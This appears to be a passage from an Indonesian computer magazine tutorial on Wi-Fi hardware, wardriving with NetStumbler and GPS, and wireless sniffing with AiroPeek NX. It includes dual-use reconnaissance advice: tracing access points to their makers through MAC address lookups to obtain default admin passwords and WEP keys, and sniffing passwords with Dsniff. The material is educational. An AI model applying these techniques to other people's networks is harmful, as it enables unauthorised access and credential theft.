Standar 802.11g yang terbaru dan lebih aman, kini justru lebih diterima pasar karena tetap menggunakan frekuensi 2.4GHz sehingga kompatibel dengan 802.11b, selain keandalan sinyalnya juga memuaskan. 802.11g menggunakan metode transmisi data OFDM yang memungkinkan kecepatan transfer data sampai 54Mbps. Kini semakin banyak perangkat 802.11g yang juga mempunyai fungsi 802.11b (combo), bahkan ada pula yang sekaligus mencakup fungsi wireless 802.11a, b, dan g sekaligus (ABG, yang di sini bukan Anak Baru Gede). Teknologi Wi-Fi yang Tersedia Standar 802.11a 802.11b 802.11g Frekuensi 5GHz 2.4GHz 2.4GHz Frq. Hopping Speed OFDM 54Mbps (lab) 20 Mbps (praktek) DSSS OFDM 11Mbps (lab) 4 Mbps (praktek) 54Mbps (lab) 20Mbps (praktek)

802.11a, OFDM pada 5GHz
802.11a adalah standar wireless yang pertama kali diratifikasi. Namun pasar tidak cepat menerima 802.11a. Standard 802.11b yang akhirnya lebih cepat diterima oleh pasar.

8

NeoTek Vol. IV No. 04

NeoStart

Persiapan untuk ‘Perang’
Onno W. Purbo (onno@indo.net.id) menunjukkan bahwa instalasi wireless NIC pada Windows sangat mudah. Bila wireless NIC itu dilengkapi antenna, maka daya jangkaunya akan lebih jauh lagi. Untuk bisa digunakan untuk wardriving haruslah yang Orinoco compatible.
WLAN CARD PADA Windows sama saja seperti instalasi periferal lainnya. Memilih WLAN card yang sesuai keperluan yang justru lebih membutuhkan pengetahuan dan pengalaman. Umumnya cukup gunakan WLAN card yang menggunakan standar 802.11b, sebab tipe ini yang paling banyak digunakan dan paling terjangkau harganya. WLAN card untuk laptop lebih murah dibandingkan untuk desktop. Ada banyak merk WLAN card, yang perlu anda perhatikan adalah chipset yang digunakan. Untuk keperluan war driving, yang artinya harus dapat menjalankan Net Stumbler, haruslah yang Orinoco compatible (menggunakan Hermes chipset), walaupun ada juga beberapa merk WLAN card yang dapat menjalankan Net Stumbler walaupun bukan Hermes chipset. WLAN card yang menggunakan Hermes chipset adalah dari jenis-jenis dengan merk Lucent, Orinoco, Avaya, Agere, Enterasys, dan Proxim. Biasanya WLAN card jenis ini lebih mahal daripada jenis lain. Namun Avaya NIC card Gold yang pernah dibahas di NeoTek III/8 W (Wireless Hacking), tadinya SGD168 namun kini bisa diperoleh dengan harga hanya SGD39. Mulai versi 0.30, Net Stumbler mendukung native driver NDIS 5.1 pada Windows XP, sehingga mendukung juga Cisco Aironet dan beberapa card berbasis Prism. WLAN card berbasis Prism termasuk yang paling banyak di pasaran, mencakup merk-merk populer seperti Linksys, D-Link, dan SMC. Intel Pro/Wireless LAN 2100 pada Centrino laptop juga kini dapat menjalankan Net Stumbler. Untuk menjalankan Mini Stumbler pada Pocket PC (dapat berbentuk CF card atau SD card), maka persyaratan WLAN card menjadi lebih ketat, mengingat Mini Stumbler sampai saat ini sama sekali tidak mendukung WLAN card yang bukan menggunakan Hermes chipset.

WI R E LE SS S E C U R IT Y

I

NSTALASI

Peralatan yang Diperlukan

pat mulai melakukan instalasi driver yang dibutuhkan.

Instalasi Driver Client di Windows
Untuk card WLAN Enterasys, terdapat program setup.exe yang mempermudah proses instalasi driver. Setelah program setup.exe dijalankan, langkah akan tampil jendela Add New Hardware Wizard selanjutnya yang perlu dilakukan adalah menekan tombol Next. Pada dasarnya sebagian besar proses yang dilakukan akan sangat otomatis.
WLAN card Enterasys mempunyai konektor untuk dipasangkan pigtail.

Dalam contoh instalasi peralatan WLAN yang dijelaskan dalam tulisan ini, saya menggunakan card PCMCIA Enterasys yang merupakan Orinoco Compatible. Tentunya bagi anda yang mempunyai card jenis yang lain tidak akan menjadi masalah, logika berfikir proses instalasi-nya tetap sama. Karena konsep yang kita kembangkan adalah menggunakan untuk menggunakan card WLAN untuk komunikasi jarak jauh, kita perlu juga menyiapkan pigtail untuk menghubungkan card WLAN tersebut ke antenna luar. Setelah yakin bahwa semua peralatan yang dibutuhkan telah cukup, kita da-

Jendela New Hardware Wizard yang tampil begitu anda menjalankan program instalasi Setup.exe.

Program setup.exe akan memberikan fasilitas untuk memilih proses pemilihan software driver yang ingin digunakan.
Pigtail yang apabila dipasangkan pada WLAN card akan meningkatkan kepekaan terhadap sinyal radio.

Vol. IV No. 04 NeoTek

9

NeoStart
Saya biasanya menggunakan fasilitas Search for the best driver for your device untuk memilih software driver yang dibutuhkan. Setelah tombol Next pada Add New Hardware Wizard di tekan, secara otomatis lokasi driver berupa file .INF akan terdeteksi. Setelah deteksi lokasi berhasil dilakukan, tekan tombol Next untuk melakukan konfigurasi card WLAN. Pada setiap profile kita dapat memilih jenis/tipe jaringan yang akan digunakan, apakah Access Point yang sering disebut Infrastructure, atau tanpa Access Point yang sering disebut AdHoc. Infrastruktur WiFi untuk jaringan jarak jauh menggantikan Telkom menggunakan Access Point. Dalam jaringan WLAN (WiFi), biasanya masing-masing jaringan mengidentifikasi diri-nya menggunakan Network Name, atau ESSID. Dalam contoh ESSID (Network Name) yang diggunakan adalah OnnoWLAN.
Biarkan installer memilih driver yang paling sesuai untuk WLAN card yang kita pasang.

Kita perlu mem-browse (mencari) folder tempat driver card di simpan. Software driver tersebut sebetulnya sudah disiapkan oleh card Enterasys yang di bundle bersama-sama dengan program setup.exe.

Specify a location yang secara otomatis akan menemukan driver file .INF yang diperlukan.

Konfigurasi WLAN Card
Langkah selanjutnya proses setup adalah mengkonfigurasi WLAN card. Pola yang digunakan oleh WLAN card Enterasys adalah dengan memilahmilah berbagai konfigurasi menjadi beberapa profile. Biasanya profile awal yang kita edit adalah profile default.

Beri nama Network Name yang ingin kita koneksikan ke komputer kita. Disini OnnoWLAN adalah infrastruktur access point yang sudah dipunyai penulis.

Konsep ESSID kira-kira mirip dengan konsep Workgroup dalam Network Neighborhood di Windows. Artinya, di channel dapat ada beberapa ESSID yang beroperasi. Masing-masing node hanya akan berkomunikasi dengan node lain yang menggunakan ESSID yang sama.
Driver yang sesuai biasanya sudah disediakan bersama program setup yang anda jalankan.

Selanjutnya pilih Specify a location dan memasukkan hasil browsing ke kolom yang telah disediakan. Hal ini sebetulnya dilakukan secara otomatis, setelah kita menekan tombol OK pada saat proses browsing dilakukan.

Sudah terdapat default profile yang dapat kita edit sesuai dengan konfigurasi WLAN yang akan kita gunakan.

Setelah menset ESSID (Network Name), kita dapat menset mekanisme enkripsi data yang ingin kita gunakan agar orang tidak dapat seenaknya melihat apa yang kita kirim melalui jaringan wireless LAN.

Specify a location, apabila kita tahu tempat driver file disimpan. Bila pada CD ROM, tick CD-ROM drive. 10

Konfigurasi default dapat kita edit.

Dengan mengaktifkan Data Security, koneksi ke AP dapat dilakukan secara terenkripsi. Encryption key pada client harus sama dengan access point-nya.

NeoTek Vol. IV No. 04

NeoStart
Agak susah untuk melihat data yang kita kirim jika mekanisme enkripsi diaktifkan. Sayang hal ini memperlambat proses pengiriman data karena semua data yang dikirim atau diterima harus diproses terlebih dulu. Umumnya tidak mengenkripsi data yang dikirim. Jika ingin mengirimkan data dengan aman, biasanya kita menggunakan enkripsi data di komputer sei perti Secure Socket Layer (SSL) atau Virtual Private Network (VPN). Peralatan wi-fi terutama yang berbentuk card PCMCIA umumnya dirancang untuk computer laptop atau notebook. Tidak heran jika konsumsi daya merupakan isu utama yang perlu di perhatikan. Memang dengan daya yang lebih besar akan menyebabkan jarak jangkau pancarannya. Tapi bagi laptop yang sedang bekerja menggunakan baterai, disediakan fasilitas Power Management yang akan menghemat penggunaan data, akan tetapi dengan konsekuensi daya pancar tidak akan sebaik jika Power Management dimatikan.
Instalasi selesai.

Hotspot adalah istilah bagi fasilitas akses wi-fi gratisan, yang dipasang di airport, mall, café dll. Fasilitas untuk mengganti IP address dengan mudah, disediakan oleh software driver. Setelah semua selesai dipilih, kita dapat menekan tombol Finish.

Kita dapat melihat ke ESSID mana kita terhubung, kondisi sambungan radio, e apakah baik (excellent) atau buruk serta channel yang digunakan. Melalui fasilitas client utility, kita juga dapat mendiagnosa kondisi card yang kita gunakan. Jika Tombol Test Card Now ditekan, maka akan dicek Hardware Integrity dan Firmware Integrity.

Card check untuk memeriksa integritas hardware dan firmware, selain juga kesesuaian antara driver dengan hardware, utility, dan firmware.

Seperti biasanya setelah instalasi driver dilakukan, beberapa DLL di Windows biasanya harus di-install ulang secara otomatis. Selesai sudah proses instalasi driver WLAN di Windows. Kita dapat menekan tombol Finish.

Wireless Client Utility
Power management penting apabila menggunakan laptop dengan baterai.

Melalui fasilitas Site monitor di client utility, kita dapat melihat hal-hal yang berkaitan dengan jaringan wireless yang termonitor oleh card wireless yang kita gunakan. Disini kita juga dapat melihat MAC address dari WLAN card kita, yang dalam hal ini adalah 00-01-F4-EC-E2-E7. Kita dapat melihat MAC address dari Access Point (AP) yang beroperasi, Signal To Noise Ratio (SNR) dari masing-masing Access Point (AP), serta Channel yang digunakan oleh masing-masing Access Point (AP).

Bagi mereka yang sering mobile menggunakan laptop dan menggunakan hotspot, biasanya sangat dibutuhkan kemudahan untuk berganti-ganti IP address dengan mudah.

Jika card WLAN diaktifkan, maka di pojok kanan bawah desktop anda akan ditampilkan icon yang memperlihatkan kekuatan sinyal wireless yang diterima oleh anda dalam bentuk tangga berwarna hijau. Semakin banyak tangga hijau yang di tampilkan, semakin baik sinyal yang diterima.

Double click icon tangga untuk melihat lebih detail.

TCP/IP behavior untuk memudahkan berganti-ganti access point di lapangan, terutama untuk war driving.

Dengan meng-klik icon sinyal tersebut kita dapat melihat dengan lebih detail berbagai parameter jaringan wireless yang kita gunakan.

Pada tab AP Names dapat dilihat berbagai MAC address dari access point yang dikenali oleh WLAN card kita dan dapat disimpan dalam tabel.

Vol. IV No. 04 NeoTek

11

NeoStart

Hasil pengamatan dapat disimpan dalam log file secara otomatis ataupun secara manual, dengan fasilitas memberi komentar pada log. Sangat membantu dalam proses war driving.

Melalui fasilitas Site Monitor, kita dapat juga memberi nama pada masing-masing Access Point (AP). Hal ini untuk memudahkan kita sebagai pengguna agar mudah mengingat masing-masing Access Point yang kita gunakan.

Masukkan tiga angka hex pertama, dipisahkan dengan tanda dan klik Search.

Akan ditemukan bahwa manufaktur chipset dari WLAN card Enterasys adalah Enterasys Networks di US.

Pada tab Selection, dengan menekan tombol Scan now, dapat dilihat lebih detail access point yang beroperasi itu seperti jenis network (infrastructure atau ad-hoc), banyaknya access point, serta channel yang digunakan.

Masukkan tiga angka hex pertama, dipisahkan dengan tanda dan klik Search.

Melalui bagian selection di fasilitas site monitor kita dapat melihat ESSID network mana saja yang sedang beroperasi di frekuensi 2.4GHz yang berhasil di-monitor oleh card wireless yang kita gunakan. Jumlah Access Point (AP) yang termonitor maupun frekuensi yang digunakan akan ditampilkan juga.

Hal yang sama dapat dilakukan juga pada MAC address dari access point yang kita amati (ini yang lebih bermanfaat sebab kita tidak melihat access point itu secara fisik). Pada contoh, kita amati ada dua MAC address dari Access Point yang teramati, yaitu: 00-30-47-24-A1-AC 00-00-4F-24-A0-72 Dari hasil pengecekan ke situs IEEE OUI akan diketahui bahwa kedua access point ini menggunakan chipset yang dimanufaktur masing-masing oleh Nissei Electric Company (Nagoya, Japan) dan Logicraft, Inc (NH, USA). Banyak hal lain yang dapat kita peroleh setelah mengetahui manufaktur chipset, dan khusus untuk access point dapat diketahui default SSID, default admin password, bahkan default WEP key. Semuanya tersedia untuk umum di berbagai situs, di antaranya: http://lleidawireless.net/space/Default+Config Catatan: Tulisan Onno W. Purbo ini sudah diedit oleh redaksi NeoTek dengan menyertakan informasi tentang MAC address.

Mengetahui Manufaktur Chipset dari MAC Address
Manufaktur dari peralatan wireless, baik itu WLAN card, Access Point, atau lainnya dapat dilihat dari 3 angka hex pertama dari MAC Address-nya. Pada contoh WLAN card Enterasys, yang MAC addressnya adalah 00-01-F4-EC-E2-E7, maka tiga angka hex yang pertama (00-01-F4) menunjukkan pabrik dari chipset-nya. Caranya dengan masuk ke situs IEEE OUI di http://standards.ieee.org/regauth/oui/index.shtml dan masukkan tiga angka pertama di atas dan klik Search.
12

NeoTek Vol. IV No. 04

NeoStart

WI RE LESS SEC U RITY
I NSTALASI WLAN CARD PADA POCKET PC
Wi-fi card memang dirancang untuk keperluan mobile, sehingga tidak heran apabila selain wi-fi card untuk laptop, yang juga populer adalah wi-fi card untuk Pocket PC. Insatalasi wi-fi card pada Pocket PC mengharuskan Pocket PC yang bersangkutan sudah dikenali oleh laptop/desktop melalui craddle.

card tipe CF card untuk Pocket PC merk D-Link tipe DCF-660W yang menggunakan chipset Atmel atau Prism dari Intersil. Pocket PC yang digunakan adalah Cassiopeia E-125 dengan prosesor MIPS 150 MHz. Kekurangan tipe ini adalah tidak dapat digunakan untuk menjalankan Mini Stumbler, versi mini dari Net Stumbler, sebab untuk Pocket PC, Mini Stumbler hanya mendukung chipset Hermes yang digunakan oleh wi-fi card yang Orinoco compatible. Untuk keperluan mengakses hotspot sehingga kita dapat mengakses email ataupun browsing langsung Internet menggunakan Pocket PC, sudah sangat memadai.

P

ADA CONTOH INI DIGUNAKAN WI-FI

Instalasi CF WLAN card untuk Pocket PC mengharuskan Pocket PC terhubung ke PC lewat craddle

1

MEMULAI INSTALASI
Ketika CF WLAN card dipasang pada Pocket PC akan tampil pesan adanya card yang tidak dikenal. Klik saja OK. Lalu pada PC mulai instal driver untuk CF WLAN card ini dengan double click pada Setup.exe. Pada Installation Wizard klik Next untuk memulai instalasi.

2

RETRIEVE DEVICE DATA & INSTAL
Installer akan me-retrieve informasi mengenai Pocket PC yang terhubung lewat craddle ini. Umumnya mencek apakah menggunakan prosesor SH3, MIPS, atau ARM. Bila sesuai akan tampil pertanyaan apakah akan menginstal di direktori default aplikasi pada Pocket PC.

3

INSTALASI SELESAI
Instalasi akan berjalan otomatis dan setelah selesai akan tampil pesan agar anda memeriksa pada Pocket PC, apakah ada langkah lanjutan yang perlu dilaksanakan di sana. Klik OK dan kemudian Finish. Selanjutnya lihat ke Pocket PC anda.

4

PADA POCKET PC
Pada Pocket PC dari Start pilih Settings, lalu pilih tab System. Akan tampak icon DCF-660W, tap icon itu dan tampak Status terhubung ke access point terkuat yang ditemukan. Pilih tab Configuration untuk menetapkan agar berasosiasi ke AP tertentu saja (misal WLAN). Setelah terasosiasi, Pocket PC perlu di-restart agar WLAN card mendapatkan IP sesuai dengan network dari AP tersebut.

Vol. IV No. 04 NeoTek

13

NeoStart

Mengenal Tetangga Anda
Anda sudah mempunyai laptop/desktop yang dilengkapi dengan WLAN card, atau mungkin anda mempunyai Centrino laptop yang sudah dilengkapi dengan built-in wireless. Dengan ini saja anda sudah bisa mulai memeriksa fasilitas wi-fi di sekeliling anda.
adalah menggambarkan cara kerjanya. Bagaimana tidak, wi-fi sesuai namanya tidak menggunakan kabel sehingga tidak terbayangkan bagaimana koneksinya satu sama lain. Belum lagi peralatan wi-fi tidaklah murah, sehingga setelah mempunyai peralatan yang sesuai pun belum tentu anda segera memahami cara kerjanya. Bagusnya peralatan yang menggunalkan gelombang radio ini selain bisa memancarkan sinyal, juga dapat menerima sinyal, dan kini terdapat banyak software yang dapat digunakan untuk memproses sinyal-sinyal ini menghasilkan informasi yang dapat dipahami. Software yang pertama dapat digunakan untuk memonitor wireless network adalah wireless client utility seperti telah dibahas sebelumnya. Selanjutnya bila anda menggunakan Windows XP, maka anda sudah mempunyai wireless hacking tool yang cukup tangguh. Windows XP mungkin bukanlah software yang biasa dikelompokkan sebagai hacking tool, tetapi kemampuan Windows XP untuk mencari sinyal terkuat dan secara otomatis terasosiasi padanya membuat Windows XP membantu anda menjadi hacker dengan cara ‘nyantol’ ke wireless network orang tanpa izin, dan mungkin tanpa anda sadari juga. Adapun yang memang dirancang untuk memonitor wireless network adalah Network Stumbler yang dikenal sebagai Net Stumbler. Net Stumbler terutama dirancang untuk WLAN

WI R E LE SS S E C U R IT Y

M

UNGKIN YANG PALING SULIT DALAM MEMBAHAS WI-FI

card berbasis Hermes chipset, seperti merk-merk Lucent, Orinico, Avaya, Agere, IBM, Enterasys, dan Proxym. Namun karena sudah mendukung Windows XP NDIS 5.1 driver, maka Net Stumber kini dapat juga bekerja dengan beberapa WLAN card berbasis Prism serta Cisco Aironet. WLAN card berbasis Hermes chipset juuga dapat dioperasikan secara promiscuous (RF mode), yaitu menerima sinyal ethernet walaupun yang bukan ditujukan untuknya. Ini yang membuat WLAN card yang Orinoco compatible ini baik juga untuk kegiatan sniffing menggunakan wireless sniffer seperti AiroPeek NX. Tentunya juga dapat digunakan sebagai ethernet sniffrer menggunakan misalnya Ethereal, Tcpdump/Windump, serta Dsniff untuk mengendus password yang dilewatkan pada network yang tidak terenkripsi.

Mencari Wireless Network dengan Windows XP
Pada komputer dengan Windows XP haruslah sudah terpasang WLAN card (tidak harus yang Hermes chipset serta tidak harua yang bisa RF mode). Dalam contoh akan digunakan Windows XP Home Edition yang terpasang pada Centrino laptop. Centrino laptop menggunakan built-in WLAN card buatan Intel, yaitu tipe Intel PRO Wireless 2100 (802.11b) atau Intel PRO Wireless 2100A (802.11a/b). WLAN card ini kompatibel dengan Net Stumber, tetapi tidak bisa RF mode.

Mencari Wireless Network dengan Windows XP

1

NETWORK ICON
Koneksi network (wireless atau bukan) ditandai dengan icon network pada taskbar. Klik kanan pada icon tersebut dan pilih View Available Wireless Networks. Akan tampak beberapa pilihan koneksi wireless. Pada koneksi yang tidak secure (tanpa enkripsi) koneksi bisa langsung dilakukan.

2

SECURE CONNECTION
Secure connection hanya bisa dilakukan apabila kita mengetahui network key, yaitu WEP key yang ditetapkan pada access point. Apabila ini adalah access point milik anda sendiri, masukkan network key-nya dan klik Connect untuk melakukan koneksi.

3

ADVANCED OPTION
Apabila koneksi yang anda inginkan tidak teramati, klik Advanced untuk menampilkan Wireless network Connection Propeties. Disini klik Refresh untuk melihat lebih banyak lagi koneksi dan dapat memilih dan meng-klik Configure untuk memasukkan parameter-parameter enkripsi maupun otentikasi.

14

NeoTek Vol. IV No. 04

NeoStart
Koneksi Otomatis ke Wireless Network
Apabila di sekitar WLAN card dikenali terdapat wireless access point, maka Windows XP secara otomatis mencoba terkoneksi pada access point ini. Windows XP akan menginformasikan anda dengan pesan pada task bar One or more wireless connection(s) are available. Klik icon network dan akan muncul jendela Wireless Windows Connection. Jendela ini menunjukkan daftar wireless network yang ada dalam jangkauan WLAN card anda. Apabila wireless network ini tidak dienkripsi, maka Windows XP akan terhubung (terasosiasi) secara otomatis kepadanya. IP address dari WLAN card tersebut akan disesuaikan dengan kelompok IP address dari wireless network yang terhubung. Apabila wireless network yang dikenali tersebut diproteksi dengan enkripsi, makaq anda harus mengetikkan WEP key (Wireless Equivalent Privacy) agar dapat terhubung padanya. WEP ini diketahui karena memang wireless network itu milik anda sendiri, atau karena anda berlangganan dengan ISP penyedia hotspot. WEP yang digunakan oleh access point harus sama dengan yang diketikkan pada client agar client dapat terhubung ke access point tersebut. Apabila anda mendapatkan kesulitan mendapatkan access point yang diinginkan, klik tombol Advanced untuk menampilkan jendela Wireless Network Connection Properties. Dari sini anda dapat menekan tombol Refresh untuk melihat lebih banyak lagi acess point yang dikenali atau menekan tombol Configure untuk menetapkan parameter-parameter enkripsi dan otentikasi. Disini juga terdapat Preferred networks yang dapat anda tanbahkan secara manual parameter-parameter enkripsi dan otentikasinya. Hal ini penting apabila anda ingin terhubung dengan wireless network kantor anda yang mungkin menggunakan access point yang memang tidak memancarkan SSID, sehingga tidak akan teramati oleh yang tidak berkepentingan. Tombol Advanced memungkinkan pilihan apakah ingin terhubung ke access point saja atau bahkan ad-hoc mode saja.

Wireless Connection Status
Begitu WLAN card anda terhubung ke suatu wireless network, maka klik pada network icon di taskbar akan menampilkan Wireless Network Connection Status. Pada tab General akan terlihat Status: Connected, Duration (lamanya sudah terhubung), Speed (pada 802,11b akan 11 Mbps atau kurang), dan Signal Strength. Juga terlihat aktivitas paket yang dikirim dari dan tiba di WLAN card tersebut. Pada tab Support akan terlihat IP Address untuk WLAN card ini. Umumnya IP address akan ditetapkan oleh DHCP server dari wireless network yang terasosiasi. Mungkin IP address itu 192.168.123.x (tanda terhubung ke SMC Barricade Router) atau 192.168.1.x (tanda terhubung ke Linksys wireless router). Dapat diamati juga default gateway wireless network ini ke Internet, seperti 192.168.123.254 atau 192.168.1.254. Informasi mengenai default IP range ini dapat anda dapatkan juga di Internet bersamaan dengan default SSID, admin password, serta default WEP keys. Bila anda mendapatkan IP address ini masih 0.0.0.0, klik tombol Repair agar menghubungi DHCP server dari wireless network yang terasosiasi dan meng-update IP address WLAN card anda.

Mencari Wireless Network dengan NetStumbler
Network Stumbler atau NetStumbler dikenal sebagai induk dari segala software war driving, mengingat fungsinya yang begitu kaya selain mudah penggunaannya. NetStumbler dirancang untuk WLAN card Hermes chipset, namun kini mendukung juga NDIS 5.1 driver pada Windows XP, serta beberapa jenis WLAN card lain dengan chipset Cisco, Prism, ataupun Intel. Untuk memastikannya anda harus menelitinya terlebih dahulu. Untuk amannya, untuk menggunakan NetStumbler, gunakan WLAN berbasis Hermes chipset (Lucent, Orinoco, Agere, Avaya, Enterasys, IBM, atau Proxim) atau gunakan Centrino laptop.

Wireless Connection Status

4

SETELAH TERKONEKSI
Setelah terkoneksi, apabila icon network di-klik akan tampil jendela Wireless Network Connection Status. Pada tab General akan tampak Status: Connected, lamanya (Duration) sudah terkoneksi, Speed (11 Mbps atau lebih rendah), serta kekuatan sinyal (Signal Strength)

5

IP ADDRESS DARI WLAN CARD
Tab Support akan menunjukkan IP address dari WLAN card yang terhubung ke wireless network. IP address ini ditetapkan oleh DHCP server dari wireless network dan menjadi anggota network yang bersangkutan. Gateway network itu ke Internet juga terlihat.

6

PROPERTIES
Kembali ke tab General dan klik Properties dan terlihat Wireless Network Properties yang terdiri dari Association dan Authentication. Paramater-parameter yang perlu untuk koneksi ke access point ditetapkan disini. Pada koneksi insecure (tanpa enkripsi/otentikasi), tidak ada yang perlu diisi.

Vol. IV No. 04 NeoTek

15

NeoStart
Dalam percobaan NeoTek menggunakan Centrino laptop (Intel chipset) dan AvayaGold card (Hermes chipset) yang kedua-duanya dapat menjalankan NetStumbler. Namun WLAN card SMC EZ Connect, Prolink USB Wireless LAN card (keduaduanya menggunakan Atmel chipset) serta D-Link DWL-650+ (Prism chipset) tidak dapat menjalankan NetStumbler.

Kelemahan Wireless Client Utilities
Setiap WLAN card sudah dilengkapi dengan wireless client utilities yang seperti Windows XP dapat digunakan untuk mengamati wireless network yang ada. Akan segera anda sadari bahwa baik Windows XP maupun utilitasutilitas ini mempunyai beberapa kelemahan, yaitu: • Tidak menunjukkan kekuatan sinyal dengan detail • Tidak menunjukkan apabila ada beberapa wireless network yang menggunakan channel yang sama.

Menjalankan NetStumbler
Begitu menjalankan NetStumbler, pilih View > Options... untuk melihat opsiopsi yang ditawarkan NetStumbler.

Tab General pada opsi NetStumbler.

Ada beberapa opsi penting di sini yang harus dipilih agar mendapatkan kinerja yang terbaik. Scan speed dibuat Fast. Dengan setting ini anda akan mendapatkan upadate yang lebih akurat mengenai wireless network yang dapat diamati. Apabila anda menjalankan NetStumber pada Windows 2000 atau Windows XP, beri check pada opsi Reconfigure card automatically. Bila ini tidak dilakukan, maka NetStumbler hanya akan mengamati wireless network yang WLAN card anda terasosiasi padanya dan tidak mengamati network yang lain. Beri pula tanda check pada Query APs for names untuk mendapatkan SSID dari wireless network yang diamati. Salah satu fitur yang menarik pada NetStumbler adalah MIDI feedback berdasarkan kekuatan sinyal. Fitur ini sangat bermanfaat untuk mendapatkan sinyal yang sebaik mungkin di antara dua titik. Apabila sinyal menguat, maka nada akan meninggi. Jadi anda

NetStumbler dijalankan pada Centrino laptop yang dipasangkan GPS receiver. Baik sinyal maupun posisi AP teramati.

cukup menggeser-geser antena sampai mendapatkan nada yang paling tinggi. NetStumbler juga dapat dijalankan bersama GPS (Global Positioning System). Pada percobaan ini NeoTek menggunakan Centrino laptop dengan built-in WLAN card serta CF GPS receiver pada PCM CIA slot. Untuk memahami lebih jauh tentang GPS, lihat NeoTek IV/3 yang khusus membahas GPS.

Beberapa Wireless Client Utilities

Tab MIDI pada opsi NetStumbler.

1

USB WIRELESS LAN CARD
USB Wireless LAN card dilengkapi dengan client utility yang cukup memadai, dapat memonitor banyak wireless network dan melaporkan MAC address, SSID, kekuatan sinyal, channel, apakah diproteksi dengan WEP encryption atau tidak, serta tipenya (infrastructure atau ad-hoc).

2

AVAYA GOLD
Avaya Gold merupakan WLAN card yang Arinoco compatible, tidak heran apabila Wireless Client Utility yang digunakan sama seperti dengan yang digunakan oleh WLAN card Orinoco. Tampak icon-nya yang khas berbentuk segitiga.

Tab GPS pada opsi NetStumbler. NetStumbler dapat dijalankan bersama GPS receiver generic (NMEA 0183) maupun Garmin dan Tripmate.

16

NeoTek Vol. IV No. 04

NeoStart
Mini Stumbler Mini Stumbler adalah padanan NetStumber untuk Pocket PC. Berbeda dengan NetStumbler yang mendukung beberapa chipset yang bukan Hermes, Mini Stumber hanya mendukung Hermes chipset.

Wireless Sniffer
AiroPeek NX adalah wireless sniffer yang terbaik di pasaran saat ini, berjalan hanya pada Windows 2000 atau Windows XP dan mensyaratkan WLAN card yang digunakan dapat dijalankan pada RF mode (promiscuous mode). AiroPeek NX yang di CD NeoTek adalah versi demo dengan keterbatasanketerbatasan seperti yang dinyatakan sewaktu anda menjalankannya.

Memulai capture dari menu Capture > Start Capture

Mengamati Network Tertutup
Untuk banyak keperluan, NetStumber sudah sangat memadai, namun ada kekurangan NetStumbler, yaitu tidak dapat mengamati wireless network yang tertutup, yaitu yang tidak memancarkan informasi tentang SSID. Ini dikarenakan NetStumber bekerja dengan mengirimkan probe request dan mengamati jawaban terhadap request itu dari suatu perangkat wireless. Untuk mengamati wireless network yang tertutup, anda harus menggunakan passive scanner pada Macintosh atau Linux, sebab belum ada software untuk ini yang berjalan pada Windows. Pada Macintosh digunakan KisMAC, sedangkan pada Linux menggunakan Kismet. Khusus untuk Kismet, selain menggunakan Kismet pada laptop atau desktop yang menggunakan sistem operasi Linux, dapat juga menggunakan Sharp Zaurus PDA yang sistem operasinya memang Linux atau iPAQ yang dipasangkan Linux. Kismet hanya dapat dijalankan menggunakan WLAN card yang dapat dijalankan dalam promiscuous mode (atau RF mode). Beberapa dari card seperti ini mungkin menggunakan Prism chipset (Senao, EnGenius, Linksys, DLink) atau Hermes chipset (Lucent, Orinoco, Proxim, Avaya), dan beberapa jenis dari Cisco Aironet. Yang pasti, Centrino laptop yang menggunakan Intel PRO 2100 WLAN card tidak dapat dijalankan dalam RF mode. Dumpfile yang dihasilkan oleh Kismet paling baik dianalisa lagi menggunakan Ethereal. Instalasi WLAN card pada Linux serta kompilasi Kismet dan menjalankannya pada Linux akan dibahas dalam kesempatan yang akan datang. Kali ini akan dibahas dulu wireless sniffer, yang berbeda dengan ethernet sniffer dari paket yang dianalisanya.

AeroPeek NX versi demo hanya dapat dijalankan selama lima menit atau maksimum memuat 250 paket atau mengirim 100 paket.

Memilih WLAN card yang dapat dijalankan secara promiscuous (RF mode)

AeroPeek NX menyediakan interface grafis terhadap pemanfaatan bandwidth.

Pada percobaan yang dilakukan NeoTek, karena built-in WLAN card pada Centrino laptop tidak dapat dijalankan

secara promiscuous (RF mode), maka pada laptop yang sama dipasang juga Avaya Gold yang kemudian dikenali sebagai Wireless Connection 2. Dari hasil capture (tab Packet) terlihat di antaranya Source dan Destination dari packet, BSSID, ukuran paket, serta Protocol yang digunakan. Source dan Destination pada dasarnya adalah MAC address yang sudah diinterpretasi nama manufakturnya.

Paket-paket yang di-capture oleh AiroPeek NX adalah paket-paket data wireless, terlihat dari protokolnya yaitu protokol 802.11.

Vol. IV No. 04 NeoTek

17

NeoStart
Yang menarik adalah tab Expert sebab disini akan didaftar hal-hal yang kiranya perlu ditelaah lebih lanjut. Adanya rogue client didata di sini, demikian juga hal-hal lain yang dianggap kurang wajar.

Tab Nodes dan tab Protocol.

Pengamatan terhadap paket pertama yang dinyatakan adanya rogue client oleh AiroPeek NX.

Tab Graph menunjukkan distribusi ukuran paket, tab Channel channel yang digunakan oleh paket, tab Signal menunjukkan distribusi kekuatan sinyal, dan tab Log menunjukkan log kegiatan AiroPeek secara ringkas.

Tab Expert menunjukkan hal-hal yang dianggap perlu ditelaah lebih lanjut, seperti dikenalinya rogue client ini.

Paket yang pertama diterima sudah menarik perhatian sebab dinyatakan sebagai adanya sinyal dari rogue client oleh AiroPeek NX. Double click pada baris pertama itu untuk mengamati paket yang bersangkutan lebih rinci. Ternyata packet yang pertama diamati oleh AiroPeek adalah sinyal yang dikirim oleh DLink DCF-660W CF WLAN card yang terpasang pada Pocket PC. Pocket PC ini yang dituding sebagai rouge client oleh AiroPeek, sebab rupanya memang terhubung ke access point yang sama dengan WLAN card Avaya yang digunakan untuk monitoring. Klik tanda silang di sisi kanan atas kedua untuk menutup detail ini dan kembali ke hasil capture. Informasi Hasil Capture Detail capture yang ditampilkan adalah pada tab Packets. Pilih tab-tab lain untuk melihat informasi mengenai hasil capture secara keseluruhan. Tab Nodes menunjukkan SSID A (Abbey) serta D-Link Sys:FA:6F:93 yang pada dasarnya adalah MAC address dari WLAN card pada Pocket PC yang dinyatakan sebagai rogue client. Tab Protocols menunjukkan protokolprotokol 802.11 yang digunakan oleh paket-paket data. Tab Summary adalah ringkasan paket data yang dicapture.
18

Tab Peer Map menunjukkan secara grafis adanya dua wireless device yang dikenali mem-broadcast paket data ethernet, yaitu D-Link Sys:FA:6F:93 (yang ternyata adalah WLAN pada Pocket PC) dan satu lagi The Linksys Group:7F:54:5B (yang ternyata adalah access point milik orang lain yang terdeteksi dan terasosiasi secara otomatis, tanpa melalui enkripsi maupun otentikasi oleh Pocket PC).

Tab Peer Map.

